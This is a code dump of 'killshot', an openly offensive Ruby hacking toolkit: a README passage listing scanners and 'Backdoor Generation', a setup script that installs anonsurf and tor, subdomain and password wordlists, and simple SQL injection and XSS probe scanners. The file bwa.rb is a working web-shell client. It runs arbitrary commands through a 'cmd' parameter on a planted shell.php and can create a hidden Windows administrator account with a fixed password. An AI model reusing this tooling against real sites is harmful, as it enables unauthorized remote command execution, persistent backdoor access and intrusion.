Scanner 47 | {1} Xss scanner 48 | {2} Sql Scanner 49 | {3} Tomcat RCE 50 | 51 | # Port Scanner 52 | [0] Nmap Scan 53 | [1] Unicorn Scan 54 | Nmap Scan 55 | [2] Nmap Os Scan 56 | [3] Nmap TCP Scan 57 | [4] Nmap UDB Scan 58 | [5] Nmap All scan 59 | [6] Nmap Http Option Scan 60 | [7] Nmap Live target In Network 61 | Unicorn Scan 62 | [8] Services OS 63 | [9] TCP SYN Scan on a whole network 64 | [01] UDP scan on the whole network 65 | 66 | # Backdoor Generation 67 | {1} Generate Shell 68 | {2} Connect Shell 69 | 70 | # USAGE 71 | 1 ----- Help Command 72 | [site] MAKE YOUR TARGET 73 | [help] show this MESSAGE 74 | [exit] show this MESSAGE 75 | 2 ------ Site command 76 | Put your target www.example.com 77 | without the http 78 | 79 | 80 | 81 | # Linux Setup 82 | 83 | git clone https://github.com/bahaabdelwahed/killshot 84 | cd killshot 85 | ruby setup.rb (if setup show any error just try to install the gems/tool manual ) 86 | ruby killshot.rb 87 | # Windows Setup 88 | Download ruby for windows ==> https://rubyinstaller.org/downloads/ 89 | Download Cmder here ==> http://cmder.net/ 90 | Download Curl For 64/32 ==> https://curl.haxx.se/windows/ 91 | Download nmap ==> https://nmap.org/download.html 92 | Enjoy ! 93 | # LAST_Update v 1.5 94 | [+] Fix setup error 95 | [+] Fix sql injection detect error 96 | [+] Add Typo3 Scanner (+brute force) 97 | [+] Detect Of the MX and NS 98 | Easy and fast use of killshot 99 | 100 | https://www.youtube.com/watch?v=SEGRh86J6vk 101 | 102 | Use KillShot To Detect and Scan cms vulnrability (Joomla && Wordpress) And Scan For Xss And Sql 103 | 104 | https://www.youtube.com/watch?v=QPF-rppYSOY 105 | 106 | 107 | Please Any one who find any error/bugs in any code contact me also if you want to add some codes 108 | or to upgrade some codes in killshot just contact me 109 | 110 | 111 | # references 112 | Vulnrability are taken from 113 | 114 | 1) http://www.exploit-db.com 115 | 2) https://sploitus.com 116 | 3) http://cxsecurity.com 117 | 118 | 119 | # FOR HELP : BTC 3FkNhWXxJTyGqGdkqZbvXqDj9ntPFoJpkW 120 | -------------------------------------------------------------------------------- /api.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /bwa.rb: -------------------------------------------------------------------------------- 1 | #/usr/bin/ruby -w 2 | require "open-uri" 3 | require "colorize" 4 | 5 | $name = ARGV[0] 6 | $uri = ARGV[1] 7 | 8 | 9 | if ($name == nil) and ($uri == nil ) then 10 | puts " 11 | ** ** 12 | ** ** 13 | ** ** **** 14 | ** ** ** **** 15 | ** ** * ** ** 16 | ** * * ** *** ** 17 | ** * * ** ** * 18 | ** ** ** ** ** 19 | ** ** ** 20 | * * 21 | * * 22 | * 0 0 * 23 | * / @ \ * 24 | * \__/ \__/ * 25 | * W * 26 | ** ** 27 | ***** 28 | USAGE : ra.rb start /shell.php 29 | ra.rb shell.php 30 | 31 | 32 | 33 | ".red 34 | 35 | 36 | end 37 | 38 | if ($name != nil ) and ($uri == nil ) then 39 | 40 | $shell = """ """ 41 | $f = File.new("#{$name}","w") 42 | $f.write($shell) 43 | $f.close 44 | 45 | puts "The File #{$name} Has been created succesufuly ! ".green 46 | 47 | end 48 | 49 | if ($name == "start") and ($uri != nil ) then 50 | $inf = open("http://#{$uri}?cmd=ver").read 51 | $inf2 = open("http://#{$uri}?cmd=uname -a ").read 52 | puts "#{$inf}#{$inf2}".green 53 | while true do 54 | 55 | 56 | 57 | print "<@root> ".red 58 | ARGV.clear 59 | $command = gets.chomp 60 | 61 | if $command == "whelp" then 62 | puts " [0] Creat User " 63 | puts " [1] Add User to ADMIN_GROUP" 64 | puts " [2] Show users " 65 | 66 | 67 | if $inf["Microsoft Windows"].nil? then 68 | 69 | else 70 | while true do 71 | 72 | puts "------------------------------------ " 73 | print "@WINDOWS :: ".green 74 | $option = gets.chomp 75 | puts "------------------------------------ " 76 | 77 | if $option == "0" then 78 | puts open("http://#{$uri}?cmd=net user john 14243454 /add ").read 79 | puts "User Jhon Has benn created with 14243454 password ! ".green 80 | 81 | end 82 | if $option == "1" then 83 | puts open("http://#{$uri}?cmd=net localgroup Administrators john /add ").read 84 | puts "user John added to group ".green 85 | end 86 | if $option == "2" then 87 | puts open("http://#{$uri}?cmd=net users ").read 88 | end 89 | end 90 | 91 | end 92 | end 93 | 94 | 95 | $html = open("http://#{$uri}?cmd=#{$command}").read 96 | 97 | puts $html 98 | end 99 | 100 | end -------------------------------------------------------------------------------- /dns.txt: -------------------------------------------------------------------------------- 1 | www 2 | mail 3 | m 4 | api 5 | blog 6 | static 7 | ftp 8 | autodiscover 9 | openvpn 10 | dev 11 | mobile 12 | cdn 13 | webmail 14 | support 15 | test 16 | email 17 | ns1 18 | ns2 19 | news 20 | beta 21 | sip 22 | lyncdiscover 23 | secure 24 | video 25 | admin 26 | smtp 27 | media 28 | search 29 | images 30 | img 31 | help 32 | shop 33 | staging 34 | login 35 | www2 36 | my 37 | vpn 38 | localhost 39 | forum 40 | app 41 | jobs 42 | store 43 | ns3 44 | go 45 | apps 46 | hostmaster 47 | info 48 | wap 49 | services 50 | ads 51 | it 52 | live 53 | community 54 | google 55 | e 56 | es 57 | cms 58 | pop 59 | s 60 | msoid 61 | developer 62 | blogs 63 | chat 64 | download 65 | wiki 66 | calendar 67 | mail2 68 | www1 69 | i 70 | assets 71 | careers 72 | stage 73 | docs 74 | de 75 | qa 76 | imap 77 | data 78 | status 79 | content 80 | tv 81 | connect 82 | cs 83 | fr 84 | origin-www 85 | stats 86 | mx 87 | events 88 | ns 89 | www3 90 | forums 91 | new 92 | web 93 | image 94 | auth 95 | business 96 | survey 97 | id 98 | portal 99 | ns4 100 | link 101 | partners 102 | jira 103 | t 104 | service 105 | ad 106 | metrics 107 | newsletter 108 | meet 109 | cloud 110 | upload 111 | preview 112 | files 113 | social 114 | sso 115 | analytics 116 | origin 117 | maps 118 | feeds 119 | travel 120 | partner 121 | ru 122 | rss 123 | videos 124 | us 125 | research 126 | labs 127 | pay 128 | games 129 | music 130 | mail1 131 | smetrics 132 | pt 133 | hr 134 | en 135 | nl 136 | cn 137 | demo 138 | c 139 | account 140 | a 141 | sites 142 | accounts 143 | dialin 144 | uk 145 | ssl 146 | owa 147 | home 148 | tools 149 | online 150 | jp 151 | corp 152 | sms 153 | developers 154 | ca 155 | v 156 | tr 157 | feedback 158 | lists 159 | ww 160 | edu 161 | crm 162 | bbs 163 | old 164 | finance 165 | dl 166 | ws 167 | stat 168 | pda 169 | library 170 | engineering 171 | archive 172 | access 173 | tech 174 | w 175 | photo 176 | share 177 | marketing 178 | map 179 | mx1 180 | health 181 | in 182 | groups 183 | global 184 | game 185 | design 186 | www4 187 | sport 188 | auto 189 | security 190 | intranet 191 | git 192 | mx2 193 | local 194 | pl 195 | education 196 | webdisk 197 | sandbox 198 | iphone 199 | br 200 | push 201 | sports 202 | press 203 | redirect 204 | ar 205 | mdm 206 | reviews 207 | promo 208 | legacy 209 | server 210 | english 211 | d 212 | cpanel 213 | training 214 | math 215 | book 216 | svn 217 | proxy 218 | vip 219 | sftp 220 | pop3 221 | mail3 222 | translate 223 | open 224 | directory 225 | cdn2 226 | cc 227 | av 228 | amp 229 | sts 230 | s1 231 | dashboard 232 | g 233 | prod 234 | payment 235 | ci 236 | ir 237 | sp 238 | passport 239 | img2 240 | about 241 | tracking 242 | exchange 243 | dns 244 | jenkins 245 | corporate 246 | books 247 | r 248 | p 249 | extranet 250 | office 251 | monitor 252 | event 253 | static2 254 | downloads 255 | www5 256 | sa 257 | ftp2 258 | li 259 | b 260 | ns5 261 | law 262 | im 263 | direct 264 | reports 265 | kr 266 | helpdesk 267 | alumni 268 | remote 269 | photos 270 | adfs 271 | stream 272 | shopping 273 | sg 274 | payments 275 | confluence 276 | b2b 277 | dns2 278 | cdn1 279 | brand 280 | widgets 281 | js 282 | dns1 283 | alpha 284 | net 285 | me 286 | s3 287 | preprod 288 | aws 289 | wwww 290 | start 291 | maintenance 292 | m2 293 | international 294 | radio 295 | img1 296 | click 297 | fs 298 | th 299 | css 300 | club 301 | tw 302 | stg 303 | sc 304 | gateway 305 | whm 306 | _spf 307 | enterprise 308 | webconf 309 | ugc 310 | surveys 311 | learn 312 | se 313 | register 314 | cache 315 | au 316 | track 317 | s2 318 | physics 319 | get 320 | catalog 321 | uat 322 | st 323 | art 324 | links 325 | pro 326 | eu 327 | cas 328 | answers 329 | play 330 | tickets 331 | relay 332 | outlook 333 | lib 334 | history 335 | geo 336 | em 337 | code 338 | static1 339 | smtp2 340 | fi 341 | fb 342 | db 343 | web1 344 | vpn2 345 | update 346 | test2 347 | sales 348 | facebook 349 | ee 350 | ms 351 | members 352 | mailer 353 | log 354 | int 355 | wireless 356 | mobil 357 | mm 358 | lb 359 | chem 360 | at 361 | api2 362 | root 363 | people 364 | housing 365 | dev2 366 | learning 367 | hotels 368 | digital 369 | smtp1 370 | pages 371 | cp 372 | affiliates 373 | widget 374 | offers 375 | horizon 376 | cse 377 | webservices 378 | vote 379 | investor 380 | bi 381 | as 382 | member 383 | job 384 | desktop 385 | checkout 386 | autoconfig 387 | testing 388 | spf 389 | resources 390 | print 391 | newsletters 392 | innovation 393 | hub 394 | backup 395 | weather 396 | uc 397 | u 398 | ro 399 | profile 400 | marketplace 401 | ldap 402 | join 403 | ie 404 | affiliate 405 | user 406 | subscribe 407 | software 408 | lab 409 | feed 410 | advertising 411 | web2 412 | up 413 | cm 414 | sustainability 415 | pic 416 | mobilemail 417 | life 418 | faq 419 | privacy 420 | mi 421 | magazine 422 | img3 423 | deals 424 | career 425 | campaign 426 | ask 427 | alerts 428 | signup 429 | no 430 | mt 431 | l 432 | flights 433 | android 434 | storage 435 | player 436 | landing 437 | hk 438 | forms 439 | work 440 | ts 441 | toolbar 442 | mc 443 | drive 444 | atlas 445 | admissions 446 | market 447 | hu 448 | file 449 | ch 450 | cdn3 451 | plus 452 | gitlab 453 | apply 454 | transfer 455 | kb 456 | idp 457 | edge 458 | contact 459 | campus 460 | biz 461 | wifi 462 | sm 463 | reporting 464 | registrar 465 | postmaster 466 | zh 467 | be 468 | sharepoint 469 | securemail 470 | rs 471 | internal 472 | ext 473 | www6 474 | socialize 475 | parking 476 | inside 477 | cz 478 | campaigns 479 | tracker 480 | so 481 | sentry 482 | quiz 483 | noc 484 | m1 485 | list 486 | ece 487 | da 488 | test1 489 | sv 490 | projects 491 | money 492 | med 493 | epaper 494 | academy 495 | one 496 | nagios 497 | emergency 498 | ec 499 | dk 500 | co 501 | 502 | -------------------------------------------------------------------------------- /list.txt: -------------------------------------------------------------------------------- 1 | admin 2 | user 3 | password 4 | 5 | love123 6 | 123456789 7 | 112233445566 8 | -------------------------------------------------------------------------------- /setup.rb: -------------------------------------------------------------------------------- 1 | #/usr/bin/ruby -w 2 | 3 | puts "Gems Instalation " 4 | system("gem install colorize && gem install shodan && gem install rest-client") 5 | system("sudo apt-get install build-essential patch ruby-dev zlib1g-dev liblzma-dev") 6 | system("gem install nokogiri") 7 | puts "Tools Instalation" 8 | system("sudo apt-get install nmap && sudo apt-get install whatweb && sudo apt-get install host ") 9 | system("git clone https://github.com/Und3rf10w/kali-anonsurf") 10 | system("apt-get install tor") 11 | system("cd kali-anonsurf") 12 | system("./installer.sh") 13 | -------------------------------------------------------------------------------- /sqlscan.rb: -------------------------------------------------------------------------------- 1 | #/usr/bin/ruby -w 2 | require "open-uri" 3 | require "net/http" 4 | require "colorize" 5 | system("cls") 6 | system("clear") 7 | print " 8 | _______ __ _______ 9 | | __|.-----.| | __|.----.---.-.-----. 10 | |__ || _ || |__ || __| _ | | 11 | |_______||__ ||__|_______||____|___._|__|__| 12 | |__| 13 | 14 | ".red 15 | 16 | list = ARGV[0] 17 | if (ARGV.length < 1) then 18 | puts "USAGE <./sqlscan.rb sites.txt >" 19 | exit 20 | 21 | end 22 | File.open("#{list}","r").each do |target| 23 | 24 | 25 | 26 | payload =["'","/*","/>X"] 27 | e = 1 28 | payload.each do |i| 29 | 30 | response = Net::HTTP.get_response(URI.parse("#{target}#{i}")) 31 | if ("400" < response.code) then 32 | print "#{target} " 33 | print " =========== > SQL DETECTED\n\n".red 34 | 35 | 36 | elsif ("300" Redirect" 39 | end 40 | $site = open("#{target}#{i}", 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre').read 41 | 42 | 43 | if($site["You have an erro"].nil?) and ($site["SQL"].nil?) and ($site["MYSQL"].nil?)then 44 | puts "#{target}" 45 | puts "Test N : #{e}" 46 | puts"=============== >[*] Not vulnrable\n\n".green 47 | e = e + 1 48 | else 49 | print "#{target} " 50 | print " =========== > [*] SQL DETECTED\n\n".red 51 | break 52 | end 53 | 54 | 55 | end 56 | end 57 | 58 | -------------------------------------------------------------------------------- /x3scan.rb: -------------------------------------------------------------------------------- 1 | #/usr/bin/ruby -w 2 | 3 | # Xss Detection tool Powred by baha 4 | require "open-uri" 5 | require "net/http" 6 | require "colorize" 7 | system("cls") 8 | print " 9 | 10 | _ _ ___ 11 | `. / / \ ____ ___ ___ , __ 12 | \,' _-' ( .' ` / ` |' `. 13 | ,'\ \ `--. | | | | | 14 | / \ \___) \___.' `._.' `.__/| / | 15 | 16 | 17 | \n".red 18 | 19 | list = ARGV[0] 20 | 21 | if (ARGV.length < 1) then 22 | def ban() 23 | puts "USAGE <./x3scan.rb sites.txt >" 24 | exit 25 | end 26 | ban() 27 | end 28 | File.open("#{list}","r").each do |target| 29 | 30 | #Payloads encoded with http encode 31 | payload =["%22%3EXXTES%3C","%2F%22%3EXXTES%3C","%2522%253EXXTES%253C","%3Ca%20href%3D%22google.com%22%3EXXTES%3C%2Fa%3E"] 32 | e = 1 33 | payload.each do |i| 34 | 35 | 36 | result = open("#{target}#{i}").read 37 | response = Net::HTTP.get_response(URI.parse("#{target}#{i}")) 38 | if (response.code != "200") then 39 | puts " #{target} Maybe Vulnrable \n\n".yellow 40 | break 41 | end 42 | if (result[">XXTES<"].nil?) then 43 | puts " #{target} Not vulnrable to xss" 44 | else 45 | puts "#{target} XSS DETECTED" 46 | break 47 | end 48 | end 49 | end 50 | --------------------------------------------------------------------------------